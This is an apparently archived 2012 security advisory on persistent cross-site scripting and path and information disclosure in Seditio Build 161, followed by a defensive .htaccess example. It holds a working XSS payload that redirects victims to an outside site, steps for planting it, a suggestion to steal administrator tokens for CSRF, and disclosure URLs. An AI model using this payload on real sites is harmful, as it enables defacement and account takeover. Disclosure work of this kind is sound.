
Seditio Build 161 Cross Site Scripting / Information Disclosure

29 Mar 2012 | Reported by Akastep | Type: packetstorm | Source: packetstormsecurity.com

Seditio Build 161 Cross Site Scripting and Information Disclosure

Code
`==========================================================  
Vulnerable Software: seditio-build161  
==========================================================  
Downloaded from:http://neocrome.net/page.php?id=2447&a=dl  
  
# md5sum sed*.rar  
aad96010a15f0c38e5cc321f8a91dd1b *seditio-build161.rar  
  
Installation: Standard (I assume with default settings)  
  
Tested:  
==========================================================  
*php.ini MAGIC_QUOTES_GPC OFF*  
Safe mode off  
/*  
OS: Windows XP SP2 (32 bit)  
Apache: 2.2.21.0  
PHP Version: 5.2.17.17  
mysql> select version()  
-> ;  
+-----------+  
| version() |  
+-----------+  
| 5.5.21 |  
+-----------+  
*/  
==========================================================  
Vuln Desc: PERSISTENT CROSS SITE SCRIPTING:  
==========================================================  
Exploitation:  
Create a new topic (/forums.php?m=newtopic&s=1)  
using the following details:  
  
Topic Title: Whatever you want.  
Topic Description: Whatever you want.  
Body:  
Inject this:   
<a href="#" onmouseover="alert('You have Been Pwned) Meh Meh');window.top.location.href='http://defaced.tld/herewego.html'">You do not need click here!I will click it for you) Of course I ll pwn you)))</a>  
  
Post the topic.  
  
Then you'll see it as plaintext the first time.  
Click the *EDIT* button, but do not touch anything after this and simply push the *UPDATE* button.  
After the update you'll return to your post. Try to hover your mouse over the link.  
  
The same rules and exploitation also apply to the *Reply* section.  
Remember, you do not need to touch anything after the *edit* button; you only need to UPDATE the topic with your "payload" and that's all.  
@Print screen on success pwn:  
http://s43.radikal.ru/i099/1203/5d/2e2dfa119083.png  
  
Other attacks are also possible using XSS to steal security tokens and exploit CSRF (change password or deface site automatically) using  
document.body.innerHTML (to steal administrator tokens)  
==========================================================  
OK, now about info and path disclosure:  
Try direct access (previous versions also suffer from info and path disclosure):  
  
http://192.168.0.15/learn/9/seditio/view.php  
  
Parse error: syntax error, unexpected ')' in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\9\seditio\system\core\view\view.inc.php on line 21  
@http://www.neocrome.net/view.php  
  
http://192.168.0.15/learn/9/seditio/plugins/contact/lang/contact.en.lang.php  
  
Notice: Undefined variable: cfg in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\9\seditio\plugins\contact\lang\contact.en.lang.php on line 37  
  
  
http://192.168.0.15/learn/9/seditio/system/lang/en/main.lang.php  
Notice: Undefined variable: cfg in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\9\seditio\system\lang\en\main.lang.php on line 450  
  
  
http://192.168.0.15/learn/9/seditio/system/lang/en/message.lang.php  
  
  
Notice: Undefined variable: usr in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\9\seditio\system\lang\en\message.lang.php on line 37  
  
Notice: Undefined variable: num in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\9\seditio\system\lang\en\message.lang.php on line 104  
==============================================================================================================================  
http://192.168.0.15/learn/9/seditio/system/core/view/view.inc.php  
Parse error: syntax error, unexpected ')' in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\9\seditio\system\core\view\view.inc.php on line 21  
  
@http://www.neocrome.net/system/core/view/view.inc.php  
  
===============================================================================================================================  
Info disclosure:  
http://192.168.0.15/learn/9/seditio/docs/new/seditio-createnew-160.sql  
http://192.168.0.15/learn/9/seditio/docs/upgrade/sedito_convert_to_utf8.optional.sql  
  
http://192.168.0.15/learn/9/seditio/system/install/install.parser.sql  
IMO it needs at least a simple .htaccess rule to protect these files from prying eyes.  
===============================================================================================================================  
  
/AkaStep ^_^  
1332959725  
`
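
The `.htaccess` protection the advisory asks for, written out as an added example (it is not from the advisory or the Seditio project). It extends the rule for the exposed `.sql` files to the include and language files that leak paths when requested directly, and assumes that no `*.inc.php` or `*.lang.php` file is meant to be fetched by a browser and that `AllowOverride` permits these directives.

```apache
# Added example: .htaccess for the Seditio web root (not part of Seditio).
# Assumption: AllowOverride lets this directory set access and PHP options.

# 1. Schema and upgrade scripts (docs/new/*.sql, docs/upgrade/*.sql,
#    system/install/*.sql) must never be served over HTTP.
<FilesMatch "\.sql$">
    <IfModule mod_authz_core.c>
        # Apache 2.4 and later
        Require all denied
    </IfModule>
    <IfModule !mod_authz_core.c>
        # Apache 2.2, the version the advisory was tested on
        Order allow,deny
        Deny from all
    </IfModule>
</FilesMatch>

# 2. *.inc.php and *.lang.php are loaded by PHP from disk, not over HTTP,
#    so denying web access does not affect include()/require().
#    This stops the direct requests that print "Undefined variable" and
#    "Parse error" messages containing the full install path.
<FilesMatch "\.(inc|lang)\.php$">
    <IfModule mod_authz_core.c>
        Require all denied
    </IfModule>
    <IfModule !mod_authz_core.c>
        Order allow,deny
        Deny from all
    </IfModule>
</FilesMatch>

# 3. Entry points such as view.php cannot be blocked, so keep PHP errors
#    out of responses and send them to the log instead.
#    Only applies when PHP 5 runs as an Apache module (mod_php).
<IfModule mod_php5.c>
    php_flag display_errors Off
    php_flag log_errors On
</IfModule>
```

Under CGI or FastCGI the third section is skipped; set `display_errors = Off` and `log_errors = On` in `php.ini` instead.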
